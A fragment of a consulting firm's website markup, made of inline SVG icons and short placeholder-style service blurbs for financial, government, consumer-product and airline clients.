						<svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 512 512"><g><path d="m257.756 273.413c75.381 0 136.707-61.326 136.707-136.707 0-75.38-61.326-136.706-136.707-136.706s-136.707 61.326-136.707 136.706c0 75.381 61.327 136.707 136.707 136.707zm0-258.384c67.093 0 121.677 54.584 121.677 121.677s-54.584 121.678-121.677 121.678-121.678-54.584-121.678-121.678c0-67.092 54.585-121.677 121.678-121.677z"></path><path d="m257.755 235.574c54.516 0 98.868-44.352 98.868-98.867s-44.352-98.867-98.868-98.867c-24.609 0-48.193 9.099-66.407 25.621-3.074 2.789-3.305 7.541-.517 10.615 2.789 3.074 7.542 3.307 10.615.517 15.443-14.009 35.441-21.724 56.309-21.724 46.229 0 83.839 37.61 83.839 83.838s-37.61 83.838-83.839 83.838c-46.228 0-83.837-37.609-83.837-83.838 0-13.96 3.497-27.777 10.114-39.957 1.981-3.647.631-8.209-3.016-10.19-3.646-1.982-8.208-.63-10.19 3.016-7.809 14.375-11.937 30.673-11.937 47.131 0 54.515 44.351 98.867 98.866 98.867z"></path><path d="m254.898 172.111c-11.802-.719-15.044-7.822-15.645-9.491-.86-3.212-3.782-5.58-7.265-5.58-4.158 0-7.529 3.371-7.529 7.53 0 .604.079 1.188.213 1.751l-.003.001c.007.027.021.079.04.144.092.355.201.703.342 1.036 1.39 3.834 6.959 15.729 23.371 18.907v9.999c0 4.15 3.365 7.515 7.515 7.515 4.151 0 7.515-3.364 7.515-7.515v-9.773c7.193-1.252 12.025-4.396 15.046-7.239 5.621-5.29 8.977-13.286 8.977-21.39 0-7.615-2.986-25.655-30.649-28.707-5.48-.605-9.389-2.349-11.62-5.183-1.969-2.503-2.182-5.268-2.182-6.341 0-1.322.363-12.913 12.913-12.913 8.234 0 11.559 5.237 12.184 6.376 1.114 2.766 3.818 4.72 6.982 4.72 4.158 0 7.529-3.371 7.529-7.529 0-1.236-.304-2.4-.832-3.429l.004-.002c-2.118-4.604-8.099-11.807-18.353-14.287v-10.087c0-4.15-3.364-7.515-7.515-7.515-4.15 0-7.515 3.365-7.515 7.515v10.055c-14.832 3.522-20.428 17.361-20.428 27.095 0 10.823 7.119 24.248 27.183 26.462 17.268 1.906 17.268 10.835 17.268 13.769 0 3.117-1.115 7.498-4.247 10.445-2.961 2.787-7.433 4.019-13.299 3.661z"></path><path d="m130.238 347.994c-1.42-1.51-3.401-2.366-5.474-2.366s-4.053.856-5.474 2.366l-51.047 54.268c-2.054 2.184-2.613 5.379-1.424 8.13 1.189 2.752 3.9 4.533 6.898 4.533h14.754v27.289c0 4.15 3.365 7.515 7.515 7.515s7.515-3.365 7.515-7.515v-34.804c0-4.15-3.365-7.515-7.515-7.515h-4.884l33.661-35.786 33.661 35.786h-4.884c-4.15 0-7.515 3.365-7.515 7.515v89.56h-42.526v-24.697c0-4.15-3.365-7.515-7.515-7.515s-7.515 3.365-7.515 7.515v32.212c0 4.15 3.365 7.515 7.515 7.515h57.555c4.15 0 7.515-3.365 7.515-7.515v-89.56h14.754c2.997 0 5.708-1.781 6.898-4.533 1.189-2.751.63-5.947-1.424-8.13z"></path><path d="m263.229 296.294c-1.42-1.51-3.401-2.366-5.474-2.366s-4.053.856-5.474 2.366l-51.046 54.269c-2.054 2.184-2.614 5.379-1.424 8.13 1.189 2.752 3.9 4.533 6.898 4.533h14.754v141.259c0 4.15 3.365 7.515 7.515 7.515h57.555c4.151 0 7.515-3.365 7.515-7.515v-141.259h14.754c2.998 0 5.708-1.781 6.898-4.533 1.189-2.751.629-5.947-1.425-8.13zm23.304 51.903c-4.151 0-7.515 3.365-7.515 7.515v141.259h-42.526v-141.26c0-4.15-3.365-7.515-7.515-7.515h-4.884l33.661-35.786 33.661 35.786h-4.882z"></path><path d="m396.221 248.46c-1.42-1.51-3.401-2.366-5.474-2.366-2.072 0-4.054.856-5.474 2.366l-51.047 54.268c-2.054 2.183-2.614 5.379-1.425 8.13 1.19 2.752 3.9 4.533 6.898 4.533h14.754v45.859c0 4.15 3.364 7.515 7.515 7.515s7.515-3.365 7.515-7.515v-53.373c0-4.15-3.364-7.515-7.515-7.515h-4.883l33.661-35.786 33.66 35.786h-4.883c-4.151 0-7.515 3.365-7.515 7.515v189.094h-42.526v-105.662c0-4.15-3.364-7.515-7.515-7.515s-7.515 3.364-7.515 7.515v113.177c0 4.15 3.364 7.515 7.515 7.515h57.556c4.151 0 7.515-3.365 7.515-7.515v-189.095h14.754c2.998 0 5.708-1.781 6.898-4.533 1.189-2.751.629-5.947-1.425-8.13z"></path><path d="m92.805 139.396c0-4.15-3.365-7.515-7.515-7.515h-44.075c-4.15 0-7.515 3.365-7.515 7.515s3.364 7.515 7.515 7.515h44.075c4.151-.001 7.515-3.365 7.515-7.515z"></path><path d="m95.012 198.37-15.676 6.141c-3.865 1.514-5.77 5.874-4.256 9.738 1.161 2.964 3.997 4.775 6.999 4.775.912 0 1.839-.167 2.739-.52l15.676-6.141c3.865-1.514 5.77-5.874 4.256-9.738-1.515-3.863-5.875-5.769-9.738-4.255z"></path><path d="m79.336 74.279 15.676 6.141c.901.353 1.827.52 2.739.52 3.002 0 5.838-1.812 6.999-4.775 1.514-3.864-.391-8.224-4.256-9.738l-15.676-6.141c-3.866-1.514-8.224.392-9.738 4.256-1.514 3.863.392 8.223 4.256 9.737z"></path><path d="m470.785 131.881h-44.075c-4.151 0-7.515 3.365-7.515 7.515s3.364 7.515 7.515 7.515h44.075c4.151 0 7.515-3.365 7.515-7.515-.001-4.15-3.365-7.515-7.515-7.515z"></path><path d="m411.506 212.365 15.675 6.141c.901.353 1.828.52 2.74.52 3.002 0 5.838-1.812 6.999-4.775 1.514-3.864-.391-8.224-4.255-9.738l-15.675-6.141c-3.868-1.514-8.224.392-9.739 4.256-1.514 3.862.391 8.222 4.255 9.737z"></path><path d="m414.25 80.94c.912 0 1.84-.167 2.74-.52l15.675-6.141c3.864-1.514 5.769-5.874 4.255-9.738-1.515-3.865-5.876-5.768-9.739-4.256l-15.675 6.141c-3.864 1.514-5.769 5.874-4.255 9.738 1.161 2.965 3.997 4.776 6.999 4.776z"></path></g></svg>					
			        				            <h6>Financial Services</h6>			            <p>We help financial institutions, from banking and insurance to wealth and securities distribution, manage risks.</p>			        
						<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve">
<g>
	<g>
		<path d="M505.709,159.575L336.462,50.682c-3.379-2.174-7.879-1.196-10.052,2.181c-2.173,3.378-1.197,7.878,2.181,10.052    l166.773,107.301h-38.878L266.64,48.07c-6.463-4.158-14.816-4.157-21.28,0L55.514,170.216H16.636L255.991,16.204l33.899,21.81    c3.379,2.173,7.878,1.197,10.052-2.181c2.173-3.378,1.197-7.878-2.181-10.052l-33.899-21.81c-4.776-3.073-10.947-3.073-15.723,0    L6.291,159.575c-5.15,3.314-7.45,9.488-5.723,15.364c1.727,5.876,7.002,9.824,13.126,9.824h36.684v25.07v21.956    c0,5.789,4.106,10.637,9.558,11.784v12.801c0,6.64,5.402,12.042,12.042,12.042h1v89.112c0,4.017,3.256,7.273,7.273,7.273    c4.017,0,7.273-3.256,7.273-7.273v-96.385c0-4.017-3.256-7.273-7.273-7.273h-5.768v-10.04h51.513v10.038h-5.768    c-4.017,0-7.273,3.256-7.273,7.273v160.696c0,4.017,3.256,7.273,7.273,7.273h5.768v10.915H74.483V429.11h5.768    c4.017,0,7.273-3.256,7.273-7.273v-18.59c0-4.017-3.256-7.273-7.273-7.273c-4.017,0-7.273,3.256-7.273,7.273v11.317h-1    c-6.64,0-12.042,5.401-12.042,12.041v12.801c-5.453,1.147-9.558,5.995-9.558,11.784v14.682H24.614    c-8.04,0-14.581,6.541-14.581,14.581v15.299c0,8.04,6.541,14.581,14.581,14.581h462.772c8.04,0,14.581-6.541,14.581-14.581    v-15.299c0-8.04-6.541-14.581-14.581-14.581h-25.764V451.19c0-5.789-4.106-10.637-9.558-11.784v-12.801    c0-6.64-5.402-12.041-12.042-12.041h-1v-146.15h1c6.64,0,12.042-5.402,12.042-12.042v-12.801    c5.453-1.147,9.558-5.995,9.558-11.784v-21.956v-25.07h36.684c6.124,0,11.399-3.948,13.126-9.824    C513.159,169.063,510.859,162.888,505.709,159.575z M253.23,60.303c1.683-1.083,3.857-1.082,5.54,0l170.833,109.914H82.398    L253.23,60.303z M64.924,184.762h382.151v17.797h-77.902h-70.585h-85.176h-70.585H64.924V184.762z M296.304,439.408v-12.801    c0-6.64-5.402-12.041-12.042-12.041h-1v-146.15h1c6.64,0,12.042-5.402,12.042-12.042v-12.801    c5.453-1.147,9.558-5.995,9.558-11.784v-14.683H361.9v14.683c0,5.789,4.106,10.637,9.558,11.784v12.801    c0,6.64,5.402,12.042,12.042,12.042h1v146.15h-1c-6.64,0-12.042,5.401-12.042,12.041v12.801    c-5.452,1.147-9.558,5.995-9.558,11.784v14.682h-56.038v-14.682C305.862,445.403,301.756,440.555,296.304,439.408z     M140.542,439.408v-12.801c0-6.64-5.402-12.041-12.042-12.041h-1v-146.15h1c6.64,0,12.042-5.402,12.042-12.042v-12.801    c5.452-1.147,9.558-5.995,9.558-11.784v-14.683h56.039v14.683c0,5.789,4.106,10.637,9.558,11.784v12.801    c0,6.64,5.402,12.042,12.042,12.042h1v146.15h-1c-6.64,0-12.042,5.401-12.042,12.041v12.801    c-5.452,1.147-9.558,5.995-9.558,11.784v14.682H150.1v-14.682C150.1,445.403,145.994,440.555,140.542,439.408z M275.989,429.11    h5.768v10.915h-51.513V429.11h5.768c4.017,0,7.273-3.256,7.273-7.273V261.142c0-4.017-3.256-7.274-7.273-7.274h-5.768V243.83    h51.513v10.038h-5.768c-4.017,0-7.273,3.256-7.273,7.273v160.696C268.716,425.854,271.972,429.11,275.989,429.11z M222.97,229.284    h-0.032h-2.253v-12.178h70.63v12.178h-2.285c-0.005,0-0.011,0.001-0.016,0.001s-0.011-0.001-0.016-0.001H222.97z M220.685,454.213    c0.71,0.231,1.466,0.36,2.253,0.36h66.059c0.811,0,1.589-0.139,2.318-0.384v11.684h-70.63V454.213z M67.21,229.284h-2.285v-12.178    h70.63v12.178h-0.001h-2.285H67.21z M64.924,454.201c0.719,0.238,1.486,0.372,2.285,0.372h66.06c0.799,0,1.566-0.134,2.285-0.372    v11.672h-70.63V454.201z M487.421,480.454l-0.02,15.333c0,0-0.004,0.001-0.015,0.001l-462.807-0.034l0.035-15.334L487.421,480.454    z M444.77,454.572c0.807,0,1.58-0.137,2.306-0.379v11.68h-70.63v-11.665c0.713,0.234,1.473,0.364,2.265,0.364H444.77z     M391.772,253.869h-5.768V243.83h51.513v10.038h-5.768c-4.017,0-7.273,3.256-7.273,7.273v160.696c0,4.017,3.256,7.274,7.273,7.274    h5.768v10.915h-51.513v-10.915h5.768c4.017,0,7.273-3.256,7.273-7.273V261.142C399.045,257.125,395.789,253.869,391.772,253.869z     M447.077,229.284L447.077,229.284h-2.286c-0.003,0-0.007,0.001-0.01,0.001s-0.007-0.001-0.01-0.001h-66.039h-0.02h-2.265v-12.178    h70.63V229.284z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M259.076,113.165V90.459c7.83,0.559,10.738,4.138,13.422,4.138c3.356,0,4.922-4.25,4.922-6.375    c0-5.48-10.738-7.829-18.344-8.053v-3.02c0-1.343-1.677-2.573-3.355-2.573c-1.902,0-3.244,1.231-3.244,2.573v3.244    c-10.626,1.118-21.252,6.711-21.252,20.804c0,14.317,11.186,18.344,21.252,21.923v26.283c-11.409-0.894-14.429-8.724-18.12-8.724    c-2.796,0-5.145,3.691-5.145,6.376c0,5.481,9.395,12.975,23.265,13.199h0v3.468c0,1.343,1.342,2.573,3.244,2.573    c1.677,0,3.355-1.231,3.355-2.573v-3.803c12.08-1.677,20.357-9.283,20.357-23.041    C279.433,121.666,268.807,116.744,259.076,113.165z M253.149,111.04c-5.929-2.237-10.738-4.586-10.738-10.962    c0-5.816,4.474-8.612,10.738-9.395V111.04z M258.406,149.181V125.58c5.48,2.349,9.842,5.481,9.843,12.528    C268.249,144.483,264.446,148.063,258.406,149.181z"></path>
	</g>
</g>
</svg>					
			        				            <h6>Government Services</h6>			            <p>Our firm has helped clients engaged in more than 100 different subsectors of the aerospace, space markets.</p>			        
						<svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 512.01 512.01"><g><path d="m479.659 248.51h-72.427l27.649-15.963c15.448-8.919 20.76-28.743 11.841-44.191l-85.052-147.317-1.922-3.329-12.424-21.52c-4.32-7.483-11.297-12.836-19.644-15.073-8.349-2.238-17.065-1.088-24.548 3.232l-154.14 88.993c-3.587 2.071-4.816 6.658-2.745 10.245s6.658 4.817 10.245 2.745l154.14-88.993c8.284-4.782 18.917-1.935 23.701 6.351l8.675 15.025-316.994 183.016-8.675-15.026c-2.317-4.013-2.933-8.689-1.733-13.166 1.2-4.476 4.07-8.217 8.084-10.535l105.905-61.144c3.587-2.071 4.816-6.658 2.745-10.245s-6.658-4.817-10.245-2.745l-105.906 61.145c-7.483 4.32-12.836 11.296-15.073 19.643-2.236 8.346-1.089 17.064 3.232 24.547l12.423 21.517c.001.001.001.003.002.004l12.425 21.521 74.55 129.125c2.93 5.074 7.173 9.228 12.228 12.056v81.232c0 17.838 14.512 32.35 32.35 32.35h226.715c4.143 0 7.5-3.358 7.5-7.5s-3.357-7.5-7.5-7.5h-226.714c-9.567 0-17.35-7.783-17.35-17.35v-85.724c.004-.085-.001-.168 0-.253v-112.823c0-9.567 7.783-17.35 17.35-17.35h230.9c.008 0 .015.001.023.001.007 0 .015-.001.023-.001h100.387c9.567 0 17.351 7.783 17.351 17.35v198.8c0 9.567-7.783 17.35-17.351 17.35h-74.616c-4.143 0-7.5 3.358-7.5 7.5s3.357 7.5 7.5 7.5h74.616c17.838 0 32.351-14.512 32.351-32.35v-198.8c-.001-17.838-14.514-32.35-32.352-32.35zm-129.151-196.805 2.637 4.568 6.429 11.136-316.993 183.017-9.067-15.704zm-234.531 229.155v96.692l-65.897-114.136 316.994-183.017 66.658 115.456c4.783 8.285 1.934 18.917-6.351 23.701l-50.149 28.954h-228.905c-17.838 0-32.35 14.512-32.35 32.35z"></path><path d="m389.037 154.707c-2.07-3.587-6.66-4.816-10.245-2.745l-71.736 41.417c-3.587 2.071-4.816 6.658-2.745 10.245 1.389 2.406 3.91 3.751 6.502 3.751 1.272 0 2.563-.324 3.743-1.006l71.736-41.417c3.587-2.071 4.816-6.658 2.745-10.245z"></path><path d="m402.858 193.646c3.587-2.071 4.816-6.658 2.745-10.245s-6.66-4.816-10.245-2.745l-28.694 16.567c-3.587 2.071-4.816 6.658-2.745 10.245 1.39 2.406 3.91 3.751 6.502 3.751 1.272 0 2.563-.324 3.743-1.006z"></path><path d="m363.409 346.343h83.4c8.547 0 15.5-6.953 15.5-15.5v-17.133c0-8.547-6.953-15.5-15.5-15.5h-83.4c-8.547 0-15.5 6.953-15.5 15.5v17.133c0 8.547 6.953 15.5 15.5 15.5zm-.5-32.633c0-.276.225-.5.5-.5h83.4c.275 0 .5.224.5.5v17.133c0 .276-.225.5-.5.5h-83.4c-.275 0-.5-.224-.5-.5z"></path><path d="m246.943 347.41v-50.267c0-8.547-6.953-15.5-15.5-15.5h-66.833c-8.547 0-15.5 6.953-15.5 15.5v50.267c0 8.547 6.953 15.5 15.5 15.5h66.833c8.547 0 15.5-6.953 15.5-15.5zm-15-50.267v17.633h-26.417v-18.133h25.917c.276 0 .5.224.5.5zm-67.333-.5h25.917v18.133h-26.417v-17.633c0-.276.224-.5.5-.5zm-.5 50.767v-17.633h67.833v17.633c0 .276-.224.5-.5.5h-66.833c-.276 0-.5-.224-.5-.5z"></path><path d="m156.61 430.743c-4.142 0-7.5 3.358-7.5 7.5s3.358 7.5 7.5 7.5h33.133c4.142 0 7.5-3.358 7.5-7.5s-3.358-7.5-7.5-7.5z"></path><path d="m222.876 445.743h99.4c4.143 0 7.5-3.358 7.5-7.5s-3.357-7.5-7.5-7.5h-99.4c-4.142 0-7.5 3.358-7.5 7.5s3.358 7.5 7.5 7.5z"></path><path d="m355.409 445.743h49.7c4.143 0 7.5-3.358 7.5-7.5s-3.357-7.5-7.5-7.5h-49.7c-4.143 0-7.5 3.358-7.5 7.5s3.358 7.5 7.5 7.5z"></path></g></svg>					
			        				            <h6>Consumer Products</h6>			            <p>Our work draws on more than 40 years of experience, delivered by 5,700 professionals in the world.</p>			        
		        <svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 512 512"><g><path d="m257.756 273.413c75.381 0 136.707-61.326 136.707-136.707 0-75.38-61.326-136.706-136.707-136.706s-136.707 61.326-136.707 136.706c0 75.381 61.327 136.707 136.707 136.707zm0-258.384c67.093 0 121.677 54.584 121.677 121.677s-54.584 121.678-121.677 121.678-121.678-54.584-121.678-121.678c0-67.092 54.585-121.677 121.678-121.677z"></path><path d="m257.755 235.574c54.516 0 98.868-44.352 98.868-98.867s-44.352-98.867-98.868-98.867c-24.609 0-48.193 9.099-66.407 25.621-3.074 2.789-3.305 7.541-.517 10.615 2.789 3.074 7.542 3.307 10.615.517 15.443-14.009 35.441-21.724 56.309-21.724 46.229 0 83.839 37.61 83.839 83.838s-37.61 83.838-83.839 83.838c-46.228 0-83.837-37.609-83.837-83.838 0-13.96 3.497-27.777 10.114-39.957 1.981-3.647.631-8.209-3.016-10.19-3.646-1.982-8.208-.63-10.19 3.016-7.809 14.375-11.937 30.673-11.937 47.131 0 54.515 44.351 98.867 98.866 98.867z"></path><path d="m254.898 172.111c-11.802-.719-15.044-7.822-15.645-9.491-.86-3.212-3.782-5.58-7.265-5.58-4.158 0-7.529 3.371-7.529 7.53 0 .604.079 1.188.213 1.751l-.003.001c.007.027.021.079.04.144.092.355.201.703.342 1.036 1.39 3.834 6.959 15.729 23.371 18.907v9.999c0 4.15 3.365 7.515 7.515 7.515 4.151 0 7.515-3.364 7.515-7.515v-9.773c7.193-1.252 12.025-4.396 15.046-7.239 5.621-5.29 8.977-13.286 8.977-21.39 0-7.615-2.986-25.655-30.649-28.707-5.48-.605-9.389-2.349-11.62-5.183-1.969-2.503-2.182-5.268-2.182-6.341 0-1.322.363-12.913 12.913-12.913 8.234 0 11.559 5.237 12.184 6.376 1.114 2.766 3.818 4.72 6.982 4.72 4.158 0 7.529-3.371 7.529-7.529 0-1.236-.304-2.4-.832-3.429l.004-.002c-2.118-4.604-8.099-11.807-18.353-14.287v-10.087c0-4.15-3.364-7.515-7.515-7.515-4.15 0-7.515 3.365-7.515 7.515v10.055c-14.832 3.522-20.428 17.361-20.428 27.095 0 10.823 7.119 24.248 27.183 26.462 17.268 1.906 17.268 10.835 17.268 13.769 0 3.117-1.115 7.498-4.247 10.445-2.961 2.787-7.433 4.019-13.299 3.661z"></path><path d="m130.238 347.994c-1.42-1.51-3.401-2.366-5.474-2.366s-4.053.856-5.474 2.366l-51.047 54.268c-2.054 2.184-2.613 5.379-1.424 8.13 1.189 2.752 3.9 4.533 6.898 4.533h14.754v27.289c0 4.15 3.365 7.515 7.515 7.515s7.515-3.365 7.515-7.515v-34.804c0-4.15-3.365-7.515-7.515-7.515h-4.884l33.661-35.786 33.661 35.786h-4.884c-4.15 0-7.515 3.365-7.515 7.515v89.56h-42.526v-24.697c0-4.15-3.365-7.515-7.515-7.515s-7.515 3.365-7.515 7.515v32.212c0 4.15 3.365 7.515 7.515 7.515h57.555c4.15 0 7.515-3.365 7.515-7.515v-89.56h14.754c2.997 0 5.708-1.781 6.898-4.533 1.189-2.751.63-5.947-1.424-8.13z"></path><path d="m263.229 296.294c-1.42-1.51-3.401-2.366-5.474-2.366s-4.053.856-5.474 2.366l-51.046 54.269c-2.054 2.184-2.614 5.379-1.424 8.13 1.189 2.752 3.9 4.533 6.898 4.533h14.754v141.259c0 4.15 3.365 7.515 7.515 7.515h57.555c4.151 0 7.515-3.365 7.515-7.515v-141.259h14.754c2.998 0 5.708-1.781 6.898-4.533 1.189-2.751.629-5.947-1.425-8.13zm23.304 51.903c-4.151 0-7.515 3.365-7.515 7.515v141.259h-42.526v-141.26c0-4.15-3.365-7.515-7.515-7.515h-4.884l33.661-35.786 33.661 35.786h-4.882z"></path><path d="m396.221 248.46c-1.42-1.51-3.401-2.366-5.474-2.366-2.072 0-4.054.856-5.474 2.366l-51.047 54.268c-2.054 2.183-2.614 5.379-1.425 8.13 1.19 2.752 3.9 4.533 6.898 4.533h14.754v45.859c0 4.15 3.364 7.515 7.515 7.515s7.515-3.365 7.515-7.515v-53.373c0-4.15-3.364-7.515-7.515-7.515h-4.883l33.661-35.786 33.66 35.786h-4.883c-4.151 0-7.515 3.365-7.515 7.515v189.094h-42.526v-105.662c0-4.15-3.364-7.515-7.515-7.515s-7.515 3.364-7.515 7.515v113.177c0 4.15 3.364 7.515 7.515 7.515h57.556c4.151 0 7.515-3.365 7.515-7.515v-189.095h14.754c2.998 0 5.708-1.781 6.898-4.533 1.189-2.751.629-5.947-1.425-8.13z"></path><path d="m92.805 139.396c0-4.15-3.365-7.515-7.515-7.515h-44.075c-4.15 0-7.515 3.365-7.515 7.515s3.364 7.515 7.515 7.515h44.075c4.151-.001 7.515-3.365 7.515-7.515z"></path><path d="m95.012 198.37-15.676 6.141c-3.865 1.514-5.77 5.874-4.256 9.738 1.161 2.964 3.997 4.775 6.999 4.775.912 0 1.839-.167 2.739-.52l15.676-6.141c3.865-1.514 5.77-5.874 4.256-9.738-1.515-3.863-5.875-5.769-9.738-4.255z"></path><path d="m79.336 74.279 15.676 6.141c.901.353 1.827.52 2.739.52 3.002 0 5.838-1.812 6.999-4.775 1.514-3.864-.391-8.224-4.256-9.738l-15.676-6.141c-3.866-1.514-8.224.392-9.738 4.256-1.514 3.863.392 8.223 4.256 9.737z"></path><path d="m470.785 131.881h-44.075c-4.151 0-7.515 3.365-7.515 7.515s3.364 7.515 7.515 7.515h44.075c4.151 0 7.515-3.365 7.515-7.515-.001-4.15-3.365-7.515-7.515-7.515z"></path><path d="m411.506 212.365 15.675 6.141c.901.353 1.828.52 2.74.52 3.002 0 5.838-1.812 6.999-4.775 1.514-3.864-.391-8.224-4.255-9.738l-15.675-6.141c-3.868-1.514-8.224.392-9.739 4.256-1.514 3.862.391 8.222 4.255 9.737z"></path><path d="m414.25 80.94c.912 0 1.84-.167 2.74-.52l15.675-6.141c3.864-1.514 5.769-5.874 4.255-9.738-1.515-3.865-5.876-5.768-9.739-4.256l-15.675 6.141c-3.864 1.514-5.769 5.874-4.255 9.738 1.161 2.965 3.997 4.776 6.999 4.776z"></path></g></svg>	        
				<h5><a href="#">Financial Services</a></h5>				<p>We help financial institutions, from banking and insurance to wealth.</p>			
		        <svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 512 512"><g><path d="m456.907 161.731-36.977-14.932c-5.967-2.408-12.25-3.628-18.678-3.628-.03 0-.06 0-.09 0l-24.136.04-20.518-19.911c5.611-3.677 9.33-10.01 9.33-17.204 0-11.34-9.227-20.567-20.567-20.567h-26.483c-.377 0-.745.037-1.107.091l-83.802-81.325c-2.83-2.748-6.562-4.263-10.51-4.267l-42.989-.028c-.002 0-.004 0-.005 0-3.635 0-7.013 1.96-8.815 5.118-1.804 3.158-1.774 7.065.075 10.194l75.651 128.099-41.77.065c-1.196.001-2.404.092-3.59.27-.059.009-.118.018-.177.029l-70.077 12.26-49.75-37.177c-2.049-1.533-4.583-2.376-7.139-2.376-.008 0-.016 0-.023 0l-24.191.042c-3.835.008-7.347 2.111-9.164 5.488s-1.637 7.465.468 10.667l34.021 51.798-33.842 51.918c-2.094 3.213-2.258 7.302-.427 10.673 1.827 3.363 5.337 5.45 9.161 5.45h.021l24.19-.042c2.566-.005 5.106-.857 7.149-2.397l49.624-37.352 70.119 12.016c.061.011.123.02.185.029 1.18.171 2.397.244 3.577.257l41.861-.065-37.682 63.807c-6.849-3.421-10.843-6.886-12.607-8.651-1.956-1.955-3.795-4.086-5.467-6.335-3.195-4.301-8.101-6.773-13.46-6.787-.015 0-.028 0-.042 0-5.355 0-10.271 2.457-13.49 6.745-1.672 2.226-3.536 4.371-5.544 6.377-6.604 6.605-22.881 17.722-57.691 17.975l-11.326.082c-6.876.05-12.471 5.685-12.471 12.562v40.948c0 4.109 3.33 7.439 7.439 7.439s7.439-3.33 7.439-7.439v-38.647l9.027-.066c40.116-.292 59.888-14.117 68.103-22.331 2.501-2.501 4.829-5.181 6.922-7.967.521-.694 1.22-.8 1.593-.8h.005c.445.002 1.075.139 1.556.786 2.104 2.828 4.421 5.513 6.886 7.979 6.615 6.614 26.491 22.031 68.105 22.333l9.027.066v73.838c0 14.933-3.471 29.913-10.038 43.322s-16.273 25.336-28.07 34.493l-37.26 28.918c-2.961 2.297-6.503 3.511-10.245 3.511s-7.284-1.214-10.243-3.51l-37.261-28.919c-11.796-9.156-21.503-21.083-28.07-34.493-6.566-13.409-10.038-28.389-10.038-43.322 0-4.109-3.33-7.439-7.439-7.439s-7.439 3.33-7.439 7.439c0 17.188 3.995 34.432 11.554 49.866 7.559 15.435 18.731 29.163 32.308 39.702l37.262 28.919c5.513 4.278 12.39 6.635 19.364 6.635s13.852-2.357 19.366-6.636l37.261-28.918c13.578-10.538 24.749-24.267 32.308-39.702s11.554-32.678 11.554-49.866v-76.137c0-6.877-5.595-12.511-12.471-12.562l-11.326-.082c-12.598-.091-22.805-1.715-30.964-3.98l40.855-69.179 91.634-.143-61.47 59.654c-2.947 2.861-3.018 7.57-.157 10.519 1.459 1.502 3.398 2.258 5.339 2.258 1.866 0 3.735-.698 5.18-2.101l10.856-10.535h29.081c11.34 0 20.567-9.226 20.567-20.566 0-7.553-4.105-14.151-10.19-17.727l22.191-21.535 23.463-.037c6.462-.012 12.773-1.254 18.756-3.695l36.925-15.059c9.181-3.745 14.875-12.23 14.857-22.145-.011-9.916-5.734-18.383-14.927-22.095zm-111.636 96.602c3.137 0 5.69 2.552 5.69 5.69 0 3.136-2.552 5.689-5.69 5.689h-13.751l11.724-11.378h2.027zm0-157.927c3.137 0 5.69 2.552 5.69 5.69 0 3.137-2.552 5.69-5.69 5.69h-.629l-11.726-11.379h12.355zm106.094 91.789-36.925 15.059c-4.2 1.712-8.628 2.585-13.163 2.593l-195.645.306c-.003 0-.007 0-.01 0-.442 0-.886-.03-1.325-.09l-73.178-12.541c-2.016-.346-4.092.156-5.73 1.389l-51.403 38.691-14.976.025 32.007-49.102c1.615-2.477 1.609-5.675-.015-8.146l-32.177-48.991 14.975-.025 51.538 38.513c1.643 1.226 3.719 1.72 5.734 1.369l73.138-12.796c.438-.062.882-.093 1.325-.094l113.263-.177c4.109-.007 7.434-3.342 7.427-7.45-.007-4.105-3.336-7.427-7.439-7.427-.004 0-.008 0-.012 0l-54.228.085-75.886-128.503 34.698.022c.06 0 .116.022.159.064l132.182 128.277-1.783.003c-4.108.007-7.433 3.343-7.426 7.451.007 4.104 3.336 7.426 7.439 7.426h.013l47.247-.078h.063c4.512 0 8.923.857 13.109 2.546l36.976 14.931c5.212 2.105 5.625 6.904 5.628 8.325 0 1.421-.396 6.222-5.6 8.345z"></path><path d="m234.902 173.999c-5.325.003-9.639 4.323-9.635 9.648.003 5.325 4.323 9.639 9.648 9.635 5.325-.003 9.639-4.323 9.636-9.648-.004-5.325-4.324-9.639-9.649-9.635z"></path><path d="m270.583 173.976c-5.325.003-9.639 4.323-9.635 9.648.003 5.325 4.323 9.639 9.648 9.635 5.325-.003 9.639-4.323 9.636-9.648-.004-5.324-4.323-9.638-9.649-9.635z"></path><path d="m305.624 173.954c-5.325.003-9.639 4.323-9.636 9.648s4.323 9.639 9.648 9.635c5.325-.003 9.639-4.323 9.635-9.648-.003-5.325-4.322-9.639-9.647-9.635z"></path><path d="m341.305 173.931c-5.325.003-9.639 4.323-9.635 9.648.003 5.325 4.323 9.639 9.648 9.635 5.325-.003 9.639-4.323 9.636-9.648-.005-5.324-4.324-9.638-9.649-9.635z"></path><path d="m150.203 316.284c-10.855 3.962-22.954 6.715-35.961 8.183-5.408.611-9.486 5.179-9.486 10.628v51.148c0 27.281 12.36 52.522 33.911 69.248l32.996 25.608c1.932 1.501 4.247 2.251 6.562 2.251s4.629-.75 6.559-2.249l32.997-25.61c21.551-16.726 33.912-41.965 33.912-69.248v-51.148c0-5.45-4.08-10.02-9.487-10.628-13.006-1.467-25.105-4.221-35.96-8.183-7.22-2.635-13.734-5.768-19.359-9.314-5.262-3.318-12.062-3.317-17.324-.001-5.627 3.546-12.14 6.681-19.36 9.315zm28.749 3.271c6.519 4.109 13.986 7.71 22.193 10.706 10.908 3.98 22.892 6.847 35.67 8.534v47.448c0 22.652-10.262 43.608-28.157 57.495l-30.435 23.621-30.435-23.621c-17.894-13.888-28.156-34.843-28.156-57.495v-47.448c12.779-1.687 24.761-4.553 35.67-8.534 8.209-2.996 15.676-6.598 22.193-10.706.449-.283 1.008-.283 1.457 0z"></path><path d="m145.068 374.175c-3.261 2.498-3.88 7.167-1.382 10.429l23.844 31.134c1.397 1.823 3.557 2.899 5.854 2.915h.051c2.278 0 4.431-1.044 5.843-2.835l43-54.567c2.543-3.226 1.989-7.904-1.239-10.446-3.224-2.543-7.904-1.988-10.446 1.239l-37.073 47.046-18.023-23.533c-2.497-3.26-7.164-3.879-10.429-1.382z"></path></g></svg>	        
				<h5><a href="#">Airlines & Transport</a></h5>				<p>We help financial institutions, from banking and insurance to wealth.</p>			
